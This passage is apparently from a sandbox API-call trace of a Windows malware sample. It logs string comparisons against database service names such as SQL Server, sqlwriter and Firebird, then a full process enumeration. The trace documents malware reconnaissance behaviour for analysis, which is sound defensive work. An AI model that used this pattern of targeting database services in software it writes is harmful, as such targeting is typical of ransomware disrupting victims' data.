(lpString1="mssqlserver", lpString2="SSDPSRV") returned -1 [0070.356] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SSDPSRV") returned -1 [0070.356] lstrlenW (lpString="StateRepository") returned 15 [0070.356] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0070.356] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0070.356] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0070.356] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0070.356] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0070.356] lstrlenW (lpString="SysMain") returned 7 [0070.356] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0070.356] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0070.356] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0070.357] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0070.741] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3cd2e68 | out: hHeap=0x5d0000) returned 1 [0070.741] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x37c [0070.745] Process32FirstW (in: hSnapshot=0x37c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0070.746] Process32NextW (in: hSnapshot=0x37c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0070.747] lstrlenW (lpString="System") returned 6 [0070.747] Process32NextW (in: hSnapshot=0x37c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0070.756] lstrlenW (lpString="smss.exe") returned 8 [0070.756] Process32NextW (in: hSnapshot=0x37c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x19c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0070.757] lstrlenW (lpString="csrss.exe") returned 9 [0070.757] Process32NextW (in: hSnapshot=0x37c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0070.757] lstrlenW (lpString="wininit.exe") returned 11 [0070.757] Process32NextW (in: hSnapshot=0x37c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0070.758] lstrlenW (lpString="csrss.exe") returned 9 [0070.758] Process32NextW (in: hSnapshot=0x37c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0070.759] lstrlenW (lpString="winlogon.exe") returned 12 [0070.759] Process32NextW (in: hSnapshot=0x37c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0070.760] lstrlenW (lpString="services.exe") returned 12 [0070.760] Process32NextW (in: hSnapshot=0x37c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0070.760] lstrlenW (lpString="lsass.exe") returned 9 [0070.760] Process32NextW (in: hSnapshot=0x37c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0070.761] lstrlenW (lpString="svchost.exe") returned 11 [0070.761] Process32NextW (in: hSnapshot=0x37c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x234, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0070.762] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0070.762] Process32NextW (in: hSnapshot=0x37c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0070.763] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0070.763] Process32NextW (in: hSnapshot=0x37c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0070.773] lstrlenW (lpString="svchost.exe") returned 11 [0070.773] Process32NextW (in: hSnapshot=0x37c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x374, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x234, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0070.782] lstrlenW (lpString="dwm.exe") returned 7 [0070.782] Process32NextW (in: hSnapshot=0x37c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x53, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0070.783] lstrlenW (lpString="svchost.exe") returned 11 [0070.783] Process32NextW (in: hSnapshot=0x37c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0070.784] lstrlenW (lpString="svchost.exe") returned 11 [0070.784] Process32NextW (in: hSnapshot=0x37c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0070.784] lstrlenW (lpString="svchost.exe") returned 11 [0070.785] Process32NextW (in: hSnapshot=0x37c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0070.785] lstrlenW (lpString="svchost.exe") returned 11 [0070.785] Process32NextW (in: hSnapshot=0x37c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0070.786] lstrlenW (lpString="svchost.exe") returned 11 [0070.786] Process32NextW (in: hSnapshot=0x37c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0070.787] lstrlenW (lpString="svchost.exe") returned 11 [0070.787] Process32NextW (in: hSnapshot=0x37c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0070.787] lstrlenW (lpString="svchost.exe") returned 11 [0070.788] Process32NextW (in: hSnapshot=0x37c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0070.788] lstrlenW (lpString="svchost.exe") returned 11 [0070.788] Process32NextW (in: hSnapshot=0x37c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0070.789] lstrlenW (lpString="svchost.exe") returned 11 [0070.789] Process32NextW (in: hSnapshot=0x37c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0070.790] lstrlenW (lpString="spoolsv.exe") returned 11 [0070.790] Process32NextW (in: hSnapshot=0x37c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0070.791] lstrlenW (lpString="svchost.exe") returned 11 [0070.791] Process32NextW (in: hSnapshot=0x37c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0070.791] lstrlenW (lpString="svchost.exe") returned 11 [0070.791] Process32NextW (in: hSnapshot=0x37c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x4fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0070.792] lstrlenW (lpString="audiodg.exe") returned 11 [0070.792] Process32NextW (in: hSnapshot=0x37c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0070.793] lstrlenW (lpString="sihost.exe") returned 10 [0070.793] Process32NextW (in: hSnapshot=0x37c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x718, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0070.794] lstrlenW (lpString="svchost.exe") returned 11 [0070.794] Process32NextW (in: hSnapshot=0x37c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0070.795] lstrlenW (lpString="taskhostw.exe") returned 13 [0070.795] Process32NextW (in: hSnapshot=0x37c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0070.795] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0070.796] Process32NextW (in: hSnapshot=0x37c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0070.796] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0070.796] Process32NextW (in: hSnapshot=0x37c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x41, th32ParentProcessID=0x834, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0070.797] lstrlenW (lpString="explorer.exe") returned 12 [0070.797] Process32NextW (in: hSnapshot=0x37c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0070.798] lstrlenW (lpString="Memory Compression") returned 18 [0070.798] Process32NextW (in: hSnapshot=0x37c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0070.799] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0070.799] Process32NextW (in: hSnapshot=0x37c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0070.799] lstrlenW (lpString="SearchUI.exe") returned 12 [0070.800] Process32NextW (in: hSnapshot=0x37c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0070.800] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0070.800] Process32NextW (in: hSnapshot=0x37c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0070.801] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0070.801] Process32NextW (in: hSnapshot=0x37c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0070.802] lstrlenW (lpString="taskhostw.exe") returned 13 [0070.802] Process32NextW (in: hSnapshot=0x37c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0070.803] lstrlenW (lpString="UsoClient.exe") returned 13 [0070.803] Process32NextW (in: hSnapshot=0x37c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0070.803] lstrlenW (lpString="taskhostw.exe") returned 13 [0070.803] Process32NextW (in: hSnapshot=0x37c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0070.804] lstrlenW (lpString="DeviceCensus.exe") returned 16 [0070.804] Process32NextW (in: hSnapshot=0x37c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0070.805] lstrlenW (lpString="UNPCampaignManager.exe") returned 22 [0070.805] Process32NextW (in: hSnapshot=0x37c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="AppHostRegistrationVerifier.exe")) returned 1 [0070.806] lstrlenW (lpString="AppHostRegistrationVerifier.exe") returned 31 [0070.806] Process32NextW (in: hSnapshot=0x37c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="screensaver.exe")) returned 1 [0070.807] lstrlenW (lpString="screensaver.exe") returned 15 [0070.807] Process32NextW (in: hSnapshot=0x37c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="xml upper.exe")) returned 1 [0070.807] lstrlenW (lpString="xml upper.exe") returned 13 [0070.807] Process32NextW (in: hSnapshot=0x37c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="defeat preston.exe")) returned 1 [0070.808] lstrlenW (lpString="defeat preston.exe") returned 18 [0070.808] Process32NextW (in: hSnapshot=0x37c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="boss isolated.exe")) returned 1 [0070.809] lstrlenW (lpString="boss isolated.exe") returned 17 [0070.809] Process32NextW (in: hSnapshot=0x37c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0070.810] lstrlenW (lpString="member.exe") returned 10 [0070.810] Process32NextW (in: hSnapshot=0x37c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="chubby-er.exe")) returned 1 [0070.871] lstrlenW (lpString="chubby-er.exe") returned 13 [0070.871] Process32NextW (in: hSnapshot=0x37c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="forgotten awareness anymore.exe")) returned 1 [0070.872] lstrlenW (lpString="forgotten awareness anymore.exe") returned 31 [0070.872] Process32NextW (in: hSnapshot=0x37c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="organization.exe")) returned 1 [0070.873] lstrlenW (lpString="organization.exe") returned 16 [0070.873] Process32NextW (in: hSnapshot=0x37c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="citizenship_surfaces_neil.exe")) returned 1 [0070.873] lstrlenW (lpString="citizenship_surfaces_neil.exe") returned 29 [0070.873] Process32NextW (in: hSnapshot=0x37c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xce4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="spray-roman.exe")) returned 1 [0070.874] lstrlenW (lpString="spray-roman.exe") returned 15 [0070.874] Process32NextW (in: hSnapshot=0x37c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x654, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="elementary-east-examined.exe")) returned 1 [0070.875] lstrlenW (lpString="elementary-east-examined.exe") returned 28 [0070.875] Process32NextW (in: hSnapshot=0x37c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x784, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="tank attacks.exe")) returned 1 [0070.875] lstrlenW (lpString="tank attacks.exe") returned 16 [0070.876] Process32NextW (in: hSnapshot=0x37c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="wires jacket.exe")) returned 1 [0070.876] lstrlenW (lpString="wires jacket.exe") returned 16 [0070.876] Process32NextW (in: hSnapshot=0x37c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="values.exe")) returned 1 [0070.877] lstrlenW (lpString="values.exe") returned 10 [0070.877] Process32NextW (in: hSnapshot=0x37c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="rebecca mid developer.exe")) returned 1 [0070.878] lstrlenW (lpString="rebecca mid developer.exe") returned 25 [0070.878] Process32NextW (in: hSnapshot=0x37c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="printersaerospace.exe")) returned 1 [0070.879] lstrlenW (lpString="printersaerospace.exe") returned 21 [0070.879] Process32NextW (in: hSnapshot=0x37c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="defects_burning_rank.exe")) returned 1 [0070.880] lstrlenW (lpString="defects_burning_rank.exe") returned 24 [0070.880] Process32NextW (in: hSnapshot=0x37c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xac4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0070.881] lstrlenW (lpString="dllhost.exe") returned 11 [0070.881] Process32NextW (in: hSnapshot=0x37c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="joke.exe")) returned 1 [0070.882] lstrlenW (lpString="joke.exe") returned 8 [0070.882] Process32NextW (in: hSnapshot=0x37c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="dim-hindu-customize.exe")) returned 1 [0070.883] lstrlenW (lpString="dim-hindu-customize.exe") returned 23 [0070.883] Process32NextW (in: hSnapshot=0x37c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="documents.exe")) returned 1 [0070.884] lstrlenW (lpString="documents.exe") returned 13 [0070.884] Process32NextW (in: hSnapshot=0x37c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="rebel.exe")) returned 1 [0070.885] lstrlenW (lpString="rebel.exe") returned 9 [0070.885] Process32NextW (in: hSnapshot=0x37c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="arbor-tutorials-lawyers.exe")) returned 1 [0070.885] lstrlenW (lpString="arbor-tutorials-lawyers.exe") returned 27 [0070.885] Process32NextW (in: hSnapshot=0x37c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xfc8, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0070.886] 